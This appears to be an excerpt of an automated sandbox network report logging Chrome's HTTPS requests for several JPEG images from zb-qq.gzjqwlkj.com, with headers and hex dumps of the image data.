                                                                                                                                                          Data Ascii: gKfsuOea\O|X]ZSr,KpZ_"S7ji\O1y/5UU)(?^pK~_N|nmQv]j#2Ixg8sb0mW*8rF>Kt:23&j>sQc\!n.`)vV!@(pBYK7h0F"MPRca00
                                                                                                                                                          2024-06-09 22:41:22 UTC16384INData Raw: 99 cd 99 3e 75 04 e3 fb dc bc 79 85 f3 83 55 1c 21 69 55 67 f0 b5 21 98 af e1 d2 c4 15 73 7c fb b9 d7 69 ea 0a cd 52 83 71 92 13 54 9b 54 9b 0d 8e 9f 38 03 ae 9f bd f9 d6 95 2f 0b 59 5e f2 fc ea 84 57 2a 6f 26 69 fe 6f fc 4a fd 75 c7 f3 1f f3 2b d5 a9 76 af fb 4b c3 38 f1 1a 81 7f c9 1b d8 b2 1d 27 54 eb ad 28 4c 33 3d 1e e4 76 a2 ee 09 93 80 8b b0 ed 9d 3e 41 1e 8a 44 4e 8c 4a ae d2 00 97 af ae 88 e3 a7 0e 58 89 a0 56 2e 04 c6 ce 1f eb 18 1c bf 54 3c f9 dc 8f 7d fc fc 37 be f1 8d bb 97 ae 5c 3f d0 6a b5 6a 5b bb 9b c7 9a cd 56 39 4d d3 77 d5 6a 35 af b7 b5 76 c8 51 aa e6 2a 67 2a cb 32 d7 98 7e 94 1b 2c 52 a9 90 4e 2f de 75 36 a2 28 d2 6b 42 5a df 2f 79 c0 5e 94 e8 5d 57 56 7f f4 c5 af 7d e3 5a 10 04 1f 8e fc ee 9b fd de f0 0b ca 51 e3 70 1c 4e 06 b5 4a
                                                                                                                                                          Data Ascii: >uyU!iUg!s|iRqTT8/Y^W*o&ioJu+vK8'T(L3=v>ADNJXV.T<}7\?jj[V9Mwj5vQ*g*2~,RN/u6(kBZ/y^]WV}ZQpNJ
                                                                                                                                                          2024-06-09 22:41:22 UTC6499INData Raw: 3f f7 e6 f5 51 7f ee 8e 93 ff d0 77 7a 0f df f3 91 8f 31 2e e1 f5 97 de 24 3a 70 95 a3 72 25 d1 34 59 22 11 25 42 1a 92 2c 05 a3 70 5a 30 2e 0a b6 87 7d ac 0f 0c 07 35 79 92 23 62 c0 95 63 ee 3a 72 80 ae 84 cd 95 ab d7 6f 5c 78 f3 df 9f 6c af be 58 8f 76 55 96 27 7e 69 61 c1 dd 79 ec 0e 77 f2 f8 f1 70 e4 d0 c1 78 f6 cc 99 f8 d4 27 3f 11 ad 6f f2 bd de 37 e3 56 bf 1f d3 b7 97 8a 77 77 77 45 88 41 7a e7 55 08 41 29 ad 74 8c d1 f8 e0 4d 08 21 89 31 a6 21 84 44 08 91 0a 21 d2 29 68 93 e9 31 f3 c2 3a c6 b8 07 e0 28 50 5a 6b e5 6c 25 95 d1 62 63 b3 ff f9 03 fb e6 0f a0 e2 f1 58 4d 59 46 be 85 45 c1 bb 52 b1 4c c5 c1 68 fe 1f 91 a0 5b 08 99 20 a3 46 46 45 26 ba 6c 6e 4c ae 9f bf 78 73 25 4d 8f 2d 0a 2b 62 66 d4 a4 d5 69 13 a5 ac 95 da 1b 1b 14 d6 da 4e f0 4c c4
                                                                                                                                                          Data Ascii: ?Qwz1.$:pr%4Y"%B,pZ0.}5y#bc:ro\xlXvU'~iaywpx'?o7VwwwEAzUA)tM!1!D!)h1:(PZkl%bcXMYFERLh[ FFE&lnLxs%M-+bfiNL


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          622192.168.2.55039654.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC639OUTGET /pc/image-pc/video/gc_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-qq.gzjqwlkj.com/pc/240516-03/static/css/t3685.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC328INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Etag: "5ab34b0d-6564"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:36 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 25956
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 3036637249366203643
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC16384INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 64 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*Duckydhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:22 UTC9572INData Raw: 79 0b 4b ec 4a 65 28 2e 85 20 85 a8 54 12 87 10 a0 41 3a 9f 89 83 9f 3e 32 8b 25 b4 27 50 47 42 0f e6 f8 1a 89 92 17 0a 22 2a cf 19 3d 07 87 b0 8a 93 ad b9 95 96 55 bd 76 cb 5b ce e3 b7 56 61 30 96 dc bc c0 60 36 f9 65 6d b4 a4 29 6c 34 b7 e5 3a 5b 51 23 e0 ad 78 e8 17 c7 75 98 4d 90 04 90 16 37 08 7d be cb f4 d7 df 4d f9 64 de 28 55 92 5b 78 ad bf 40 d6 ba 33 f4 d0 8f 75 91 95 6e 3e 5d 26 d2 db b3 b1 fb 65 bb 16 6a fb 71 60 47 61 e8 f7 db ac 8b a2 dc 8a c2 98 65 c4 37 1d 18 fb 64 24 04 a8 87 05 78 9d 69 bf 5a f3 f1 e3 c0 c3 e3 71 dc 88 65 95 a5 28 0d c8 28 81 7e 63 73 d7 cc 3f 92 b7 47 a3 bc 16 69 cc ca e4 a7 8c ab 2c 4b 1a b3 0d a0 87 62 c4 ae 97 d3 60 fc b5 d8 79 77 81 3e eb 6a b4 cb b9 b3 2e 3f 76 32 a5 4e 11 be 5d 48 72 61 fe 63 24 17 2a 96 22 21 40
                                                                                                                                                          Data Ascii: yKJe(. TA:>2%'PGB"*=Uv[Va0`6em)l4:[Q#xuM7}Md(U[x@3un>]&ejq`Gae7d$xiZqe((~cs?Gi,Kb`yw>j.?v2N]Hrac$*"!@


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          623192.168.2.55039954.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC641OUTGET /pc/image-pc/video/lebo_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-qq.gzjqwlkj.com/pc/240516-03/static/css/t3685.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:21 UTC328INHTTP/1.1 200 OK
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Etag: "5ab34b0d-4600"
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 17:13:36 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17920
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 2217765216427586472
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Hit
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC16384INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:22 UTC1536INData Raw: 94 2d 54 ea 4a 94 b1 42 c3 cc 0d fc ea 64 6f 71 79 3c 0e 41 8f e4 f8 f7 31 98 ac d6 2d a7 59 86 f4 0c 46 36 23 21 0f 21 6d 39 be 33 11 90 cb 85 48 71 49 ba d0 4d be c1 55 2c 95 39 40 c2 4e 41 df 29 1e e9 2f da 56 33 95 23 31 30 c0 8d d1 03 b8 03 2e cd 7b 97 ca 22 e7 31 3c 92 03 98 cc 56 63 06 56 ac 74 ac 6e 23 19 09 29 2e 24 a5 45 6d 46 8a db 6e 9b 12 07 71 2a b7 85 43 91 a6 60 60 5c 83 7b ca 47 be 5c 76 15 8c f5 41 31 30 c0 8b 98 44 77 87 7d 0d e4 1c e3 90 f2 58 90 b1 f9 39 31 9b c6 e3 d6 e3 b0 f1 78 f8 51 31 b1 10 eb b6 0b 77 d3 c2 65 86 ca d4 00 05 65 3b ac 2d 7b 51 d1 ca 42 91 26 20 b9 da 49 91 ed 92 4a 5d 6c dc ea 80 09 0c 36 00 00 ed 00 02 2c af 75 f9 e2 d9 d8 73 4d 7a cf 4a 21 7e 7e 20 c2 19 7f 4e 13 b3 b7 f9 a8 63 d6 db 67 93 fb 6f c3 e5 fc 3a 50
                                                                                                                                                          Data Ascii: -TJBdoqy<A1-YF6#!!m93HqIMU,9@NA)/V3#10.{"1<VcVtn#).$EmFnq*C``\{G\vA10Dw}X91xQ1wee;-{QB& IJ]l6,usMzJ!~~ Ncgo:P


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          624192.168.2.55039743.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC368OUTGET /pc/image-pc/video/mg_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC346INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          ETag: "5ab34b0d-3d69"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Content-Length: 15721
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 1317234620100641961
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC2538INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:22 UTC1289INData Raw: 20 eb 29 32 59 8b 0c 67 01 98 f1 af 41 4d 29 ef 05 99 aa 48 f8 26 8c 52 80 8f 03 4d 27 f7 20 c6 29 06 0b 9f 14 56 b5 4e 9a 72 5c 06 49 83 da c9 54 9a 0f b3 56 06 31 26 59 82 30 8a 05 28 0f 53 a5 ba 56 0d 61 1e 71 43 e9 b9 60 a5 ab 51 e7 4d 56 6b 5a a1 06 85 2d 2f 6d a7 7e 2c c1 95 05 4a 83 d4 ea 9d cd b1 10 b5 4b 77 96 f6 f7 b1 98 e1 88 45 33 0a 42 d1 83 5e 47 a0 23 c6 ba 14 5d 27 18 3a 8c ce 9b 0b 77 3c c0 48 8c a5 8d 00 23 fa 6b 60 2f 28 18 4c d1 58 c8 3b 36 f6 28 59 da c2 e0 2c 8b c4 3f 0a ee 45 06 c3 71 f6 ea b9 dd 02 73 92 34 f3 85 e0 86 25 f3 f7 d7 46 e4 c8 12 c3 d1 09 a5 0d 05 41 d2 66 19 52 49 62 fc ca 49 fe dd 35 70 83 a2 b0 7a c0 8f 2b 48 c2 85 8d 76 d1 33 e1 18 aa 04 60 c7 c4 bb c6 a4 0d f9 54 fd da 5b 9e 31 b4 8c b6 51 c4 ac ed 70 68 90 af 21
                                                                                                                                                          Data Ascii: )2YgAM)H&RM' )VNr\ITV1&Y0(SVaqC`QMVkZ-/m~,JKwE3B^G#]':w<H#k`/(LX;6(Y,?Eqs4%FAfRIbI5pz+Hv3`T[1Qph!
                                                                                                                                                          2024-06-09 22:41:22 UTC2800INData Raw: bd 93 fa 48 71 23 f1 b0 ff 00 a4 70 e0 7e ae 54 e0 ba df 55 37 dc da 43 f2 0f 69 f8 72 8c 5d c7 9b b6 ed fc 45 ce 46 e2 54 8c a0 e1 6f cc 80 1a 56 f9 46 fd 7c cf b0 6a 8f 42 b0 db fd ca da 19 66 7b 14 67 f0 1d a6 6b 7a 76 d0 ee af 2a 70 cc f7 71 98 ef 63 e7 e3 cb 77 2d 94 36 89 71 76 9c a5 7b 8b f5 42 20 52 23 63 bb 9e a4 9d a9 af 4c eb 85 6c ec da 9d 80 7a c4 ed ba d3 2a 6c dc 0e c1 ed 13 d0 1a e2 2c ee a7 9f 83 3f 6b 69 67 75 0a b3 ee b6 96 77 50 81 9e 5c fe 6a ec 0f a4 0f dd b8 c9 ee 62 b0 91 82 e6 31 f1 55 d2 37 63 45 99 41 60 15 58 ec c3 ce 87 c4 eb 73 b6 dc 78 98 13 8c ea 3a 47 51 2f fa 4e 7b be 1f 09 e6 96 4b 4a d4 25 c4 a7 fb 9c a8 ff 00 0e 5a b9 a6 6f f0 91 9f 40 02 7e 9c ed e6 e7 fc 86 a7 4c 8c 39 4f 56 76 06 03 b9 f0 5d a7 63 15 94 96 90 4b 98
                                                                                                                                                          Data Ascii: Hq#p~TU7Cir]EFToVF|jBf{gkzv*pqcw-6qv{B R#cLlz*l,?kiguwP\jb1U7cEA`Xsx:GQ/N{KJ%Zo@~L9OVv]cK
                                                                                                                                                          2024-06-09 22:41:22 UTC1296INData Raw: fa e8 35 04 c9 02 10 2f 16 0a 08 af 25 8c 3e 56 60 1f 1d 68 e0 37 a0 a7 e5 9a 45 3d 64 6e a8 0f cb d7 41 9c 2c a6 81 fc 41 dc 16 f8 69 fb ca fb 37 79 c7 ff 00 0a 3b fb b2 c7 93 05 81 d8 1d cf 56 63 28 00 75 27 5e 37 fd dd e9 3b 8e a0 36 29 b7 5d 4e d7 19 00 ed 70 0f a0 00 84 93 c0 0a ce 67 cc 5b 67 bd e1 05 cc 92 3d 7f e1 32 ec d5 de 63 f9 07 b9 e4 c8 ce 8f ea e4 25 58 31 b6 43 76 48 b9 52 28 94 1d 87 5a 93 e2 49 3e 3a f4 3e 8b d2 b6 be 5b e9 82 d5 40 4b 6a 59 dc f1 34 ab b1 fb 87 00 00 e1 36 fb 4d a2 6c ec 50 e0 00 a9 3e f3 3d 9f d9 fd b1 67 da 5d bf 67 86 b6 55 aa 2f a9 7d 30 ff 00 bb 3b 81 ea 39 3d 4f 4a 0f 60 1a f9 8b af f9 99 fa c6 fd f7 27 00 4d 14 7f 2a 0f a4 7d e7 f3 12 67 01 be de 1d d5 e3 73 d4 39 0e 1f 6e 73 34 ec 4e d7 38 2e e1 8a e7 21 74 05
                                                                                                                                                          Data Ascii: 5/%>V`h7E=dnA,Ai7y;Vc(u'^7;6)]Npg[g=2c%X1CvHR(ZI>:>[@KjY46MlP>=g]gU/}0;9=OJ`'M*}gs9ns4N8.!t
                                                                                                                                                          2024-06-09 22:41:22 UTC2800INData Raw: ed fb 90 7e 20 d6 a2 a8 c0 d0 f5 15 eb be b6 c5 92 ef 50 a1 00 d7 ab 03 43 8f fe 27 c7 d4 63 99 7f 5a 84 7f e4 7f f1 c1 9d b5 89 be 18 2e d4 9e 25 6b 69 c3 f7 14 18 70 ee 23 73 2d e5 80 10 98 55 88 34 67 46 a1 5f 13 ed ae a7 cd fe 12 6f b7 e5 c0 d1 4d 83 dc c2 a0 a2 5f 6d 65 87 10 ab 4a fe 51 c8 40 ea 01 45 db b5 cb f4 89 ee 0c 6b 5f 44 4a 96 cb 2d 86 fe 36 9a db b8 2c 2f 2d 23 6e e4 b7 16 90 dc 2b 23 2a fd 25 c7 27 8d 5e 9b 54 6b a4 da 75 0d 9e f7 cd 6a fb 6b 89 72 9b 37 0c c8 43 7f bd 6e 95 65 c0 f6 0a e1 e9 96 ad dd b7 73 7c 0a 90 7f 4c e5 8f e2 1c 60 1b 1c 9c 61 21 b1 c8 4c a6 d8 8a 63 b2 9b 91 17 92 3f 89 8e bd 47 55 ea 3c 41 f4 ad 53 74 0c 28 ea c8 ed 6f 70 0c 72 44 78 86 ea 53 c7 c3 e6 53 d7 f1 1a 9e e8 75 9f 92 ce 39 2a 1b 69 57 72 bd 41 1e 6a 7c
                                                                                                                                                          Data Ascii: ~ PC'cZ.%kip#s-U4gF_oM_meJQ@Ek_DJ-6,/-#n+#*%'^Tkujkr7Cnes|L`a!Lc?GU<ASt(oprDxSSu9*iWrAj|
                                                                                                                                                          2024-06-09 22:41:22 UTC1296INData Raw: 4e e8 b6 76 9f 37 d4 fc cf 0e e1 c3 df 14 e2 cf 62 a6 91 e3 4b ae 2c a0 32 b3 a9 55 70 45 6a 87 c7 ae ba ff 00 19 79 cd e9 b2 e3 1a 4a 33 e7 b1 ef 27 a4 b7 07 7a d1 f8 37 1d 8d 3a d3 4a 6b 95 86 2c b8 e1 28 dc e7 ee 84 52 e3 b1 79 09 2d ae 66 1c a1 11 44 5e 57 7e 81 63 25 58 02 7d a3 a6 a5 2f b8 c1 71 13 3c 0e 2c 22 dd d5 9e 59 ae 1a 4c e6 26 d3 37 2b dc 9b 71 7b 7d 33 86 e3 1c 75 25 42 70 5e 3c 8d 28 06 96 37 0a 49 35 35 a7 d8 46 68 14 00 61 18 9a 41 8c bc 9a c6 cd f1 f6 56 02 18 9e 58 ec 54 42 c8 1c 10 79 bf 23 ca 85 77 22 9b 1d 41 b8 70 e7 cc 54 fa 2b f6 c6 2c 25 56 a6 b2 55 81 68 38 28 2a 7e 52 bb 83 ee a6 97 49 15 9c 34 54 f0 d4 d2 65 67 01 35 34 99 59 df a7 a2 a4 c9 fb d3 a6 a6 90 60 4b a6 7b 5c 81 48 af 52 d9 32 10 93 25 94 92 2a c7 33 8a a3 9e 0d
                                                                                                                                                          Data Ascii: Nv7bK,2UpEjyJ3'z7:Jk,(Ry-fD^W~c%X}/q<,"YL&7+q{}3u%Bp^<(7I55FhaAVXTBy#w"ApT+,%VUh8(*~RI4Teg54Y`K{\HR2%*3
                                                                                                                                                          2024-06-09 22:41:22 UTC1592INData Raw: 90 d2 e6 f2 eb 63 16 31 2f 99 2c 62 52 ab 00 58 cd 41 24 9a 96 52 4e e7 50 0c 30 66 8d d9 60 0c 24 03 ca e6 50 c7 da 58 ff 00 5d 28 fd 55 8f 43 55 f5 c3 4f f5 11 5a ca 20 57 17 02 a6 36 0d c7 70 36 a0 e9 5a e9 c4 d2 48 42 62 d6 16 19 31 f6 9d ce f7 58 e7 8e d9 7d 3c 95 be 39 66 f5 e6 2d 6c a4 ba 87 6a 12 4d 2a 2a 7d 9a 51 2b 73 08 4d 65 ad 8a 9e 31 a9 b0 37 37 f6 10 5c fe e4 70 f7 0e 8b 2b db 40 8b 2a a8 22 bc 1e 47 f8 8e db 12 bc 7d 9a 13 b3 43 96 70 16 e9 06 2f 76 36 42 ee 28 27 c1 65 e5 51 7f 6b 73 73 fb 70 62 79 cd 68 8c 0f 31 5e a1 4b ed e3 4f 76 94 d4 e1 e9 ef 8c c4 e2 78 cd 26 36 07 40 4c 1a 4d d7 f8 ea 5b 07 ec be e7 c4 65 19 22 c7 77 2e 5f 1d 88 b8 b9 75 07 d1 7b 98 6e 7e 9e 6d c8 03 d3 9d 63 62 7c 81 d6 93 a9 6a 17 91 97 35 52 7b e8 45 47 a4 56
                                                                                                                                                          Data Ascii: c1/,bRXA$RNP0f`$PX](UCUOZ W6p6ZHBb1X}<9f-ljM**}Q+sMe177\p+@*"G}Cp/v6B('eQksspbyh1^KOvx&6@LM[e"w._u{n~mcb|j5R{EGV
                                                                                                                                                          2024-06-09 22:41:22 UTC2110INData Raw: 0d 04 f1 3c 74 0e 8a 40 55 14 a0 a5 00 d4 1d b5 b2 a1 69 40 b9 50 91 4e 1c 0d 64 8d d5 c0 cc d5 a9 6c ea 01 af 1e 22 93 ac 2f f2 27 77 34 96 b7 13 d8 62 f1 91 63 e6 91 a5 c6 da e3 e0 b3 b6 bf 92 74 31 5c 35 dd b4 21 63 90 34 34 84 ec 07 1f 97 72 cc 43 f6 49 43 89 35 e3 52 48 a6 54 27 b7 1e f8 eb 9b e6 05 74 d2 83 80 00 03 5e 60 67 51 87 74 e2 4c ed c9 c5 5c 61 2d ed ad ac 71 f7 79 03 90 b9 8e 05 6e 6e ca 9c 21 89 a4 91 9d cc 70 86 7e 00 9a d5 d8 b1 63 4a 58 16 46 a0 c4 92 40 a7 c7 d2 78 f7 4a 66 f1 d0 50 00 01 35 f8 0e e1 c3 bf 8c b7 37 73 df dc 7e e7 ce 1b 71 fb ae 22 c7 0b 72 55 5f 6b 7c 7f d2 7a 4c 9f 1e ce 7e 89 39 13 51 bb 50 0a 8a 62 ed d4 53 3c 09 6f 49 af fe a3 25 b7 0c 6b 96 2a 17 d0 b4 a7 fc a2 48 fd c2 d7 57 96 17 39 3c 55 96 52 df 1b 61 0e 3a
                                                                                                                                                          Data Ascii: <t@Ui@PNdl"/'w4bct1\5!c44rCIC5RHT't^`gQtL\a-qynn!p~cJXF@xJfP57s~q"rU_k|zL~9QPbS<oI%k*HW9<URa:


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          625192.168.2.55040143.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:21 UTC368OUTGET /pc/image-pc/video/ag_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-qq.gzjqwlkj.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC346INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:21 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          ETag: "5ab34b0d-3af5"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          Content-Length: 15093
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          X-NWS-LOG-UUID: 5771421152550564225
                                                                                                                                                          Connection: close
                                                                                                                                                          X-Cache-Lookup: Cache Miss
                                                                                                                                                          Access-Control-Allow-Origin: *
